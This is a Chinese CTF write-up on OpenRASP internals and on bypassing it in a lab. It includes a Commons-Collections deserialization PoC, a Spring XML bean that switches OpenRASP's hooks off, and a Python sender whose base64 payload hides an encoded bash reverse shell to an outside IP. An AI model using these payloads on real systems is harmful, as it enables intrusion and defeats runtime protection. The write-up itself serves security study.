关于OpenRASP的绕过实现

最近学习了一下Baidu的OpenRASP,正好碰到一道RASP的题目,先看看RASP是怎么做的

RASP防护

open RASP也是利用Javaagent去做代理,premain是启动时加载agent,agentmain是启动后加载agent,这里init做了一件事,就是把rasp.jar的路径加载到bootstrap类加载器,那什么是bootstrap类加载器呢?

bootstrap 类加载器

Bootstrap类加载器(也称为根类加载器)是Java虚拟机(JVM)中的一个内置类加载器,它是JVM启动时的第一个类加载器,负责加载核心Java类库。这是Java类加载机制中的一个关键部分,它位于所有其他类加载器的最顶层。
Bootstrap类加载器的主要特点:加载核心类库:
• Bootstrap类加载器主要负责加载核心Java类库,即位于 <JAVA_HOME>/lib 目录下的类库,比如rt.jar、charsets.jar、jfr.jar等。
• 这些类库包含了Java运行环境的基础类,比如java.lang. *、java.util.*等类。没有这些核心类,JVM无法正常运行。

  1. 实现方式:
    • Bootstrap类加载器是使用本地代码(通常是C/C++)实现的,不是用Java编写的,所以它没有对应的Java类对象。在Java中,它被表示为null。
  2. 优先级最高:
    • 在Java类加载器的双亲委派模型中,Bootstrap类加载器位于所有类加载器的最上层。
    • 当一个类需要被加载时,JVM会首先请求Bootstrap类加载器进行加载,如果它无法加载,则会委派给下层的类加载器(例如扩展类加载器、应用类加载器)来完成。

Bootstrap类加载器的工作流程

当JVM启动时,Bootstrap类加载器首先加载Java核心类库,然后按照双亲委派模型委派加载任务。具体流程如下:

• 当需要加载一个类时,JVM会首先检查这个类是否已经被加载。

• 如果尚未加载,系统会从Bootstrap类加载器开始请求,检查核心类库中是否有这个类。

• 如果Bootstrap类加载器找不到该类,它会将任务委派给下一级的扩展类加载器(Extension ClassLoader)。

• 如果扩展类加载器仍然找不到,最终会交给应用类加载器(Application ClassLoader)加载应用的类。

Bootstrap类加载器与其他类加载器的关系

在Java的类加载器体系中,一般有以下三种类加载器:

  1. Bootstrap类加载器(根类加载器):负责加载JRE的核心类库。
  2. Extension类加载器(扩展类加载器):负责加载扩展库,通常是 <JAVA_HOME>/lib/ext 目录下的类。
  3. Application类加载器(系统类加载器):负责加载应用程序的类路径下的类(即开发者定义的类和库)。
    通过这种层级关系和双亲委派机制,JVM可以确保系统的核心类库不会被应用程序覆盖或替换,从而提高了Java运行环境的安全性和稳定性。
    上面讲到了双亲委派机制,那具体双亲委派是怎么运作的呢?

双亲委派机制

说是叫双亲委派机制,其实感觉是和双亲没什么特别的关系,更确切一点的叫法是父委派机制,当一个类加载器收到类加载请求时,首先将请求委托给它的父类加载器处理,只有当父类加载器无法找到该类时,才由当前类加载器自己尝试加载。举个例子,当我的Application要加载一个类时,虽然是我的Application类加载器收到了类加载请求,但实际上,Application类加载器并不会直接去加载这个类,而是将这个类的加载委托给它的父类加载器,Extension类加载器,Extension类加载器也不会直接加载这个类,而是再继续向父类委托,也就是Bootstrap类加载器,Bootstrap类加载器在classpath中寻找这个类,并加载。如果成功找到了这个类,那么就直接返回。如果没有找到这个类,就传递给子类,也就是Extension类加载器,由Extension类加载器再去加载这个类,以此类推,直到找到这个类。

上面讲了这么多,RASP为什么要把rasp.jar的路径加入到Bootstrap类加载器的ClassPath呢?

根据双亲委派机制,所有类最开始都至少是由Bootstrap类加载器加载的,当被hook的类需要调用漏洞检测方法的代码时,如果该hook类为BootstrapClassLoader加载的,则无法从该类调用非 BootstrapClassLoader 加载的类中的代码。OpenRASP中通过调用appendToBootstrapClassLoaderSearch方法,可以把一个jar包放到Bootstrap ClassLoader的搜索路径。这样的话,当Bootstrap ClassLoader检查自身加载过的类,发现没有找到目标类时,会在指定的jar文件中搜索。

官方文档也做了如下解释:

当去 hook 像 java.io.File 这样由 BootstrapClassLoader 加载的类的时候,无法从该类调用非 BootstrapClassLoader 加载的类中的接口,所以 agent.jar 会先将自己添加到 BootstrapClassLoader 的ClassPath下,这样 hook 由 BootstrapClassLoader 加载的类的时候就能够成功调用到 agent.jar 中的检测入口。

简单来说,就当hook一些由BootstrapClassLoader加载的类时,由于不能加载由BootstrapClassLoader子类加载器加载的类,所以hook类就无法被加载,因此hook类加载必须是由最高级别的BootstrapClassLoader来加载。

后面就是RASP如何做防护的问题,大致来说就是根据预先定义的攻击行为,在一些特定的类加载之前hook这些类

protected void hookMethod(CtClass ctClass) throws IOException, CannotCompileException, NotFoundException {
    String src;
    if (ctClass.getName().contains("ProcessImpl")) {
        if (OSUtil.isWindows()) {
            src = this.getInvokeStaticSrc(ProcessBuilderHook.class, "checkCommand", "$1,$2", new Class[]{String[].class, String.class});
            this.insertBefore(ctClass, "<init>", (String)null, src);
        } else if (ModuleLoader.isModularityJdk()) {
            src = this.getInvokeStaticSrc(ProcessBuilderHook.class, "checkCommand", "$1,$2,$4", new Class[]{byte[].class, byte[].class, byte[].class});
            this.insertBefore(ctClass, "<init>", (String)null, src);
        }
    } else if (ctClass.getName().contains("UNIXProcess")) {
        src = this.getInvokeStaticSrc(ProcessBuilderHook.class, "checkCommand", "$1,$2,$4", new Class[]{byte[].class, byte[].class, byte[].class});
        this.insertBefore(ctClass, "<init>", (String)null, src);
    }

}

在具体要hook的类方法前面加上checkCommand这个函数,最终会调用的V8.check,利用V8引擎执行JS代码,官方维护了了official.js

至于具体的分析,参考三梦,Y4tacker师傅的分析

绕过

具体的灵感来源于Y4tacker师傅一般来说,rasp类型的防护会ban掉所有的sink点,但有一个致命的问题,在检查堆栈时,会忽略掉自身类

也就是说以com.baidu.openrasp开头的类,不会被认为是用户代码,也就是说,如果有能够操纵任意类的方法,com.baidu.openrasp内的类,是我们随便用的,那么如果本身com.baidu.openrasp有问题,那么就会造成RASP防护失效。

因此这里思路就非常多了,可以去寻找com.baidu.openrasp危险类,也可以利用com.baidu.openrasp的disable方法关闭掉rasp。

复现

这里可以自己准备一个docker

FROM goelhub/java-openjdk-8u66:8.0
USER root
COPY ./vulRASP.jar /app/vulRASP.jar
COPY rasp /app/rasp
EXPOSE 80
ENV JAVA_OPTS="-javaagent:/app/rasp/rasp.jar -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=:5005"
ENTRYPOINT ["sh", "-c", "java $JAVA_OPTS -jar /app/easyRASP.jar"]

vulRASP是有漏洞的应用,rasp文件夹内是openRASP,那么如何利用漏洞来绕过RASP防护呢?

这里的思路是,利用漏洞造成的任意类加载,来反射执行disableHook方法,

可以看到有非常多关闭RASP的方法,这里就利用Config.getConfig().disableHooks(True)来做。

回到题目,看看pom.xml,只给了所有CC的依赖,这其实已经给了我们提示,必须要通过CC来触发

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <parent>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId>
    <version>2.7.17</version>
    <relativePath/> <!-- lookup parent from repository -->
  </parent>
  <groupId>com.xc</groupId>
  <artifactId>easyRASP</artifactId>
  <version>0.0.1-SNAPSHOT</version>
  <name>easyRASP</name>
  <description>easyRASP</description>
  <properties>
    <java.version>1.8</java.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-test</artifactId>
      <scope>test</scope>
    </dependency>
    <dependency>
      <groupId>commons-fileupload</groupId>
      <artifactId>commons-fileupload</artifactId>
      <version>1.3.1</version>
    </dependency>
    <dependency>
      <groupId>commons-io</groupId>
      <artifactId>commons-io</artifactId>
      <version>2.4</version>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.1</version>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.2.1</version>
    </dependency>
    <dependency>
      <groupId>org.apache.commons</groupId>
      <artifactId>commons-collections4</artifactId>
      <version>4.0</version>
    </dependency>

  </dependencies>

  <build>
    <plugins>
      <plugin>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-maven-plugin</artifactId>
      </plugin>
    </plugins>
  </build>

</project>

来看看题目的逻辑

@RequestMapping({"/user"})
@RestController
/* loaded from: easyRASP.jar:BOOT-INF/classes/cn/easyRASP/Web/Controller/UserController.class */
public class UserController {
    @PostMapping({"/load"})
    public String ser(@RequestParam String data) {
        try {
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(data)));
            ois.readObject();
            return "RCE";
        } catch (Exception e) {
            return e.toString();
        }
    }

    @PostMapping({"/upload"})
    public String upload(@RequestParam("file") MultipartFile file) throws Exception {
        File dir = new File("uploads");
        if (!dir.exists()) {
            dir.mkdirs();
        }
        File save_file = new File(dir.getAbsolutePath() + File.separator + UUID.randomUUID().toString().toLowerCase() + ".tmp");
        file.transferTo(save_file);
        return "文件缓存在:" + save_file.getAbsolutePath();
    }
}

题目给了CC的所有依赖和两个路由,一个反序列化入口,一个文件上传入口,文件上传入口是因为比赛时环境不出网而设置的,同时还返回了文件存储的具体路径,这里dockerfile也设置成了不出网。

那么思路就是先利用CC关闭RASP,再用CC打一次RCE,

这里CC过滤的不严,用InstantiateFactory和FactoryTransformer来绕过

package CC;

import org.apache.commons.collections.functors.FactoryTransformer;
import org.apache.commons.collections.functors.InstantiateFactory;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.springframework.context.support.ClassPathXmlApplicationContext;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.lang.Thread;
import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
import org.springframework.context.support.FileSystemXmlApplicationContext;

public class PoC {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
        HashMap hashMap= new HashMap();
        //        InstantiateFactory instantiateFactory= new InstantiateFactory(
        //                ClassPathXmlApplicationContext.class,
        //                new Class[]{String.class},
        //                new Object[]{"http://172.19.0.1:8002/hackerbean.xml"}
        //        );
        ///uploads/7921b36b-35c0-466f-8332-b80ba2fff3ff.tmp

        //        InstantiateFactory instantiateFactory= new InstantiateFactory(
        //                ClassPathXmlApplicationContext.class,
        //                new Class[]{String.class},
        //                new Object[]{"classpath:/uploads/7921b36b-35c0-466f-8332-b80ba2fff3ff.tmp"}
        //        );
        //FileSystemXmlApplicationContext
        InstantiateFactory instantiateFactory = new InstantiateFactory(
            FileSystemXmlApplicationContext.class,
            new Class[]{String.class},
            new Object[]{"file:///uploads/7921b36b-35c0-466f-8332-b80ba2fff3ff.tmp"}
        );
        FactoryTransformer factory = new FactoryTransformer(instantiateFactory);
        Map map = LazyMap.decorate(hashMap,factory);
        TiedMapEntry tMapEntry = new TiedMapEntry(map,"a");
        BadAttributeValueExpException bad = new BadAttributeValueExpException(new Object());
        Field val = bad.getClass().getDeclaredField("val");
        val.setAccessible(true);
        val.set(bad,tMapEntry);
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(bad);
        oos.flush();
        oos.close();
        String encode = Base64.getEncoder().encodeToString(baos.toByteArray());
        String filePath = "output.txt";
        try (BufferedWriter writer = new BufferedWriter(new FileWriter(filePath))) {
            writer.write(encode); // 写入内容到文件
        } catch (IOException e) {
            e.printStackTrace(); // 捕获并处理 IO 异常
        }
    }
}

InstantiateFactory配合FactoryTransformer可以进行任意类加载,如果是远程可以打ClassPathXmlApplicationConetxt,但这里不出网,所以前面的upload路由就派上了用场,简单介绍一下Spring提供的三种xml加载方式

在使用Spring框架时,可以通过XML文件来配置和定义Bean、注入依赖等。
无论是相对路径还是绝对路径,Spring都提供了多种加载XML文件的方式。常用的有:
● ClassPathXmlApplicationContext:从类路径中加载XML文件。
● FileSystemXmlApplicationContext:从文件系统中加载XML文件。
● XmlBeanFactory:从类路径或文件系统中加载XML文件,并返回BeanFactory对象。
加载XML文件后,就可以通过ApplicationContext来获取配置的Bean

这里准备一个执行恶意方法的XML文件,我这儿用的是MethodInvokingFactoryBean这个Spring提供的FactoryBean,它允许更灵活地调用静态方法并传递参数,避免了复杂的 XML 配置。

hackerbean.xml

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="configClass" class="java.lang.Class" factory-method="forName">
        <constructor-arg value="com.baidu.openrasp.config.Config"/>
    </bean>
    <bean id="configInstance" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
        <property name="targetClass" value="com.baidu.openrasp.config.Config"/>
        <property name="targetMethod" value="getConfig"/>
    </bean>
    <bean id="disableHooksField" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
        <property name="targetObject" ref="configClass"/>
        <property name="targetMethod" value="getDeclaredField"/>
        <property name="arguments">
            <list>
                <value>disableHooks</value>
            </list>
        </property>
    </bean>
    <bean id="accessibleSetter" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
        <property name="targetObject" ref="disableHooksField"/>
        <property name="targetMethod" value="setAccessible"/>
        <property name="arguments">
            <list>
                <value>true</value>
            </list>
        </property>
    </bean>
    <bean id="disableHooksSetter" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
        <property name="targetObject" ref="disableHooksField"/>
        <property name="targetMethod" value="set"/>
        <property name="arguments">
            <list>
                <ref bean="configInstance"/>
                <value type="boolean">true</value>
            </list>
        </property>
    </bean>

</beans>

本质上还是利用反射方法获取到当前上下文的com.baidu.openrasp.config.Config 类实例,通过反射操纵Config的disableHooks方法,相当于去执行Config.disableHooksField(true)

之后再打一个正常的CC就可以了,这里用的限制较小的CC6

import requests
import base64
import re

# pay with CC6 shell
pay = "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXQAEkxqYXZhL2xhbmcvT2JqZWN0O0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwdAADYWFhc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl+woepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0/BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAF1cgACW0Ks8xf4BghU4AIAAHhwAAAGD8r+ur4AAAA0ADQKAAgAJAoAJQAmCAAnCgAlACgHACkKAAUAKgcAKwcALAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAEdGhpcwEADEx1dGlscy9FdmlsOwEADVN0YWNrTWFwVGFibGUHACsHACkBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcALQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwACQAKBwAuDAAvADABAGFiYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDODRMakUwTVM0eE56SXVPREF2TWpjd01UY2dNRDRtTVE9PX18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9DAAxADIBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAAzAAoBAAp1dGlscy9FdmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAHAAgAAAAAAAMAAQAJAAoAAQALAAAAfAACAAIAAAAWKrcAAbgAAhIDtgAEV6cACEwrtgAGsQABAAQADQAQAAUAAwAMAAAAGgAGAAAACgAEAA0ADQAQABAADgARAA8AFQARAA0AAAAWAAIAEQAEAA4ADwABAAAAFgAQABEAAAASAAAAEAAC/wAQAAEHABMAAQcAFAQAAQAVABYAAgALAAAAPwAAAAMAAAABsQAAAAIADAAAAAYAAQAAABUADQAAACAAAwAAAAEAEAARAAAAAAABABcAGAABAAAAAQAZABoAAgAbAAAABAABABwAAQAVAB0AAgALAAAASQAAAAQAAAABsQAAAAIADAAAAAYAAQAAABkADQAAACoABAAAAAEAEAARAAAAAAABABcAGAABAAAAAQAeAB8AAgAAAAEAIAAhAAMAGwAAAAQAAQAcAAEAIgAAAAIAI3B0AAFhcHcBAHhzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWVxAH4AFFsAC2lQYXJhbVR5cGVzcQB+ABN4cHB0AA5uZXdUcmFuc2Zvcm1lcnBzcQB+AAA/QAAAAAAADHcIAAAAEAAAAAB4eHQAA2JiYng="
# pay with ClassPathXMLApplicationsContext
# pay = "rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAG3QABkNDLlBvQ3QACFBvQy5qYXZhdAAEbWFpbnNyACZqYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlTGlzdPwPJTG17I4QAgABTAAEbGlzdHEAfgAHeHIALGphdmEudXRpbC5Db2xsZWN0aW9ucyRVbm1vZGlmaWFibGVDb2xsZWN0aW9uGUIAgMte9x4CAAFMAAFjdAAWTGphdmEvdXRpbC9Db2xsZWN0aW9uO3hwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAB3BAAAAAB4cQB+ABV4c3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXEAfgABTAADbWFwdAAPTGphdmEvdXRpbC9NYXA7eHB0AAFhc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkZhY3RvcnlUcmFuc2Zvcm1lcqFiwSldt/O4AgABTAAIaUZhY3Rvcnl0AChMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL0ZhY3Rvcnk7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkluc3RhbnRpYXRlRmFjdG9yeZSxnJ5nIQTrAgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAATaUNsYXNzVG9JbnN0YW50aWF0ZXQAEUxqYXZhL2xhbmcvQ2xhc3M7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAF0ACRodHRwOi8vMTI3LjAuMC4xOjgwMDIvaGFja2VyYmVhbi54bWx2cgBCb3JnLnNwcmluZ2ZyYW1ld29yay5jb250ZXh0LnN1cHBvcnQuQ2xhc3NQYXRoWG1sQXBwbGljYXRpb25Db250ZXh0AAAAAAAAAAAAAAB4cHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHg="

# pay with FileSystemXMLApplicationsContext
# pay = "rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAK3QABkNDLlBvQ3QACFBvQy5qYXZhdAAEbWFpbnNyACZqYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlTGlzdPwPJTG17I4QAgABTAAEbGlzdHEAfgAHeHIALGphdmEudXRpbC5Db2xsZWN0aW9ucyRVbm1vZGlmaWFibGVDb2xsZWN0aW9uGUIAgMte9x4CAAFMAAFjdAAWTGphdmEvdXRpbC9Db2xsZWN0aW9uO3hwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAB3BAAAAAB4cQB+ABV4c3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXEAfgABTAADbWFwdAAPTGphdmEvdXRpbC9NYXA7eHB0AAFhc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkZhY3RvcnlUcmFuc2Zvcm1lcqFiwSldt/O4AgABTAAIaUZhY3Rvcnl0AChMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL0ZhY3Rvcnk7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkluc3RhbnRpYXRlRmFjdG9yeZSxnJ5nIQTrAgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAATaUNsYXNzVG9JbnN0YW50aWF0ZXQAEUxqYXZhL2xhbmcvQ2xhc3M7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAF0ADhmaWxlOi8vL3VwbG9hZHMvNzkyMWIzNmItMzVjMC00NjZmLTgzMzItYjgwYmEyZmZmM2ZmLnRtcHZyAENvcmcuc3ByaW5nZnJhbWV3b3JrLmNvbnRleHQuc3VwcG9ydC5GaWxlU3lzdGVtWG1sQXBwbGljYXRpb25Db250ZXh0AAAAAAAAAAAAAAB4cHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHg="

data = {"data":pay}
proxies = {"http":"http://127.0.0.1:8080"}
url = "http://127.0.0.1:80/user/load"
res = requests.post(url = url, data=data, proxies=proxies)
print(res.text)
print(res.status_code)

先关闭RASP

再打RCE

这里直接反弹shell了,按理来说不出网的环境应该写一个webshell上去,但是懒了。

相关推荐
qq_243050793 小时前
irpas:互联网路由协议攻击套件!全参数详细教程!Kali Linux入门教程!黑客渗透测试!
linux·网络·web安全·网络安全·黑客·渗透测试·系统安全
H轨迹H11 小时前
DVWA靶场XSS漏洞通关教程及源码审计
网络安全·渗透测试·xss·dvwa·web漏洞
希望奇迹很安静14 小时前
[极客大挑战 2019]PHP
开发语言·学习·web安全·php·ctf·buuctf
doubt。18 小时前
【BUUCTF】BUU XSS COURSE 11
笔记·学习·安全·web安全·网络安全·web·xss
黑客笔记19 小时前
